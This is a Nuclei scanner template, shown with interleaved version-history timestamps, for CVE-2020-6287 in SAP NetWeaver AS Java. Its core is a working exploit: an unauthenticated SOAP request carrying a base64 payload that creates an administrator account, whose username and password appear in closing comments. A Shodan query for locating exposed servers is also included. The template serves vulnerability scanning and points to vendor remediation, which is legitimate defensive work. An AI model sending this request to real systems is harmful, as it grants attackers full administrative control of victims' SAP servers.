2021-01-02 04:56:15 +00:00
id : CVE-2020-6287
2020-07-21 06:53:00 +00:00
info :
2022-04-29 19:58:07 +00:00
name : SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition
2020-07-21 06:53:00 +00:00
author : dwisiswant0
severity : critical
2022-05-17 09:18:12 +00:00
description : SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system.
2023-09-06 12:22:36 +00:00
remediation : |
Apply the relevant SAP Security Note or patch provided by the vendor to mitigate this vulnerability.
2021-03-16 15:10:36 +00:00
reference :
- https://launchpad.support.sap.com/#/notes/2934135
- https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
- https://www.onapsis.com/recon-sap-cyber-security-vulnerability
2021-06-05 04:59:59 +00:00
- https://github.com/chipik/SAP_RECON
2022-04-29 19:58:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-6287
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2022-05-17 09:18:12 +00:00
cvss-score : 10
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-6287
cwe-id : CWE-306
2023-10-16 10:55:14 +00:00
epss-score : 0.97274
2023-12-12 11:07:52 +00:00
epss-percentile : 0.99828
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:*
2022-07-21 18:26:57 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : sap
product : netweaver_application_server_java
2023-09-06 12:22:36 +00:00
shodan-query : http.favicon.hash:-266008933
2023-07-12 11:56:50 +00:00
tags : cve,cve2020,sap,kev
2020-07-21 06:53:00 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-06-05 06:45:32 +00:00
- raw :
2020-07-21 06:53:00 +00:00
- |
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
Host : {{Hostname}}
Content-Type : text/xml; charset=UTF-8
2020-07-21 08:00:14 +00:00
Connection : close
2020-07-21 06:53:00 +00:00
2021-06-05 06:45:32 +00:00
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>
CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==
</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
2020-07-21 06:53:00 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2020-07-21 06:53:00 +00:00
words :
2021-06-05 04:59:59 +00:00
- "CTCWebServiceSi"
- "SOAP-ENV"
condition : and
2021-05-05 11:56:14 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : header
2021-05-05 11:56:14 +00:00
words :
- "text/xml"
2021-06-05 04:59:59 +00:00
- "SAP NetWeaver Application Server"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
# userName - sapRpoc6351
2023-10-14 11:27:55 +00:00
# password - Secure!PwD8890
2023-11-27 10:10:24 +00:00
# digest: 490a0046304402206fb2a5da16ff132b2a21082b70432b3286b90e734a24e273a09465280bf374ee0220631d9f5a1ff141020710b9edd119eab03396ce1c7e9a508552b24155d6650132:922c64590222798bb761d5b6d8e72950